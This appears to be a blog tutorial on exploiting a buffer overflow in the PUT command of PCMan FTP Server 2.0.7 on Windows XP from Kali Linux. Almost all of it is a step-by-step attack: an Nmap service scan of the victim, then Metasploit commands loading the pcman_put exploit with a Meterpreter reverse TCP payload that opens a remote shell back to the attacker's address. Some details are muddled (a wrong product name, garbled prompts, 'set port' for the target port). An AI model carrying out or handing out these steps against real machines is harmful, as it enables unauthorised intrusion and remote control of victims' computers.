Exploit Windows PC using PCMAN FTP Server Buffer Overflow – PUT Command

This module exploits a buffer overflow vulnerability found in the PUT command of the PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous credentials are enabled…

Exploit Targets

PCMAN FTP v2.0.7 Server

Requirement

Attacker: kali Linux

Victim PC: Windows XP SP 3

Most Easy File Sharing FTP Server run on port 21 so in order to discover information regarding the PCMan FTP Server we need to execute the following script:

 Nmap  -sV 192.168.0.127

Open Kali terminal type msfconsole

Now type use exploit/windows/ftp/pcman_put

msf exploit (pcman_put)>set payload windows/meterpreter/reverse_tcp

msf exploit (pcman_put)>)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (pcman_put)>)>set rhost 192.168.0.127

msf exploit (pcman_put)>)>set port 21

msf exploit (pcman_put)>)>exploit  

1 Comment Exploit Windows PC using PCMAN FTP Server Buffer Overflow – PUT Command

Leave a Reply

Your email address will not be published. Required fields are marked *